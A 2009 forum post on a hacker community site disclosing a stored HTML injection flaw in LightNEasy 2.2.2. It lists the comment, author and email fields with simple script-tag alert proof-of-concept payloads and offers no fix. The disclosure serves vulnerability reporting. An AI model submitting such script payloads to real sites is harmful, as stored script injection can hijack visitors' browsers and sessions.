LightNEasy 2.2.2 - HTML Injection Vulnerability

Results 1 to 1 of 1

Thread: LightNEasy 2.2.2 - HTML Injection Vulnerability

LinkBack
- LinkBack URL
- About LinkBacks
- Bookmark & Share
- Digg this Thread!
- Add Thread to del.icio.us
- Bookmark in Technorati
- Tweet this thread
Thread Tools
- Show Printable Version
- Subscribe to this Thread…
Display
- Linear Mode
- Switch to Hybrid Mode
- Switch to Threaded Mode

3rd June 2009, 22:32 #1

MaXe
Founder of InterN0T

Join Date

Jun 2008

Location

Australia

Posts

4,259

Blog Entries
38

Rep Power

10

LightNEasy 2.2.2 - HTML Injection Vulnerability

LightNEasy - HTML Injection Vulnerability

Version Affected: 2.2.2 (15th January 2009) (newest)

Info: LightNEasy, a simple and light Content Management System and Website Builder

Credits: InterN0T

External Links:
http://lightneasy.org/

-:: The Advisory ::-

Vulnerable Input Fields:
1. Comment <script>alert(0)</script>
2. Author <script>alert(0)</script>
3. Email "><script>alert(0)</script>

Affected URL's:
http://www.website.tld/lightneasy/LightNEasy.php?page=news&id=1&showcomments=1

-:: Solution ::-
I didn't bother to find one, sorry.

Disclosure Information:
- Vulnerability found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.

All of the best,
MaXe

Reply With Quote

« moziloCMS 1.11.1 - XSS Vulnerability | SiteCore.NET 6.0.0 - XSS Vulnerability »

Similar Threads

Even Google is prone to XSS, HTML injection ,CSRF Attacks,Please check this out!!

By manoj9372 in forum Security News and Feeds

Replies: 2
Last Post: 17th December 2010, 00:20
ShareTronix 1.0.4 - HTML Injection Vulnerability

By MaXe in forum InterN0T - Advisories

Replies: 0
Last Post: 29th January 2010, 14:30
Simple Machines Forum '[url]' Tag HTML Injection Vulnerability

By MaXe in forum Exploits, Vulnerabilities & PoCs

Replies: 3
Last Post: 17th December 2009, 00:00
AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities

By MaXe in forum InterN0T - Advisories

Replies: 4
Last Post: 28th May 2009, 08:47

Bookmarks

Bookmarks

Posting Permissions

You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
[VIDEO] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

Powered by vBulletin® Version 4.1.10
Copyright © 2013 vBulletin Solutions, Inc. All rights reserved.
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

InterN0T Affiliates

Recommended Links

About Us

InterN0T is one of the most friendly hacker forums on the Internet. We welcome both new and old visitors, who desire to share and learn from each other, while enjoying the benefits of a highly engaged community with trustworthy staff. We do not make any profit of your stay here, our goal is simply just to share our love for information security and be damn good at it.

Search

Advanced Search

Connect With Us

Official Twitter

Official YouTube

Copyright ©2007 - 2013, InterN0T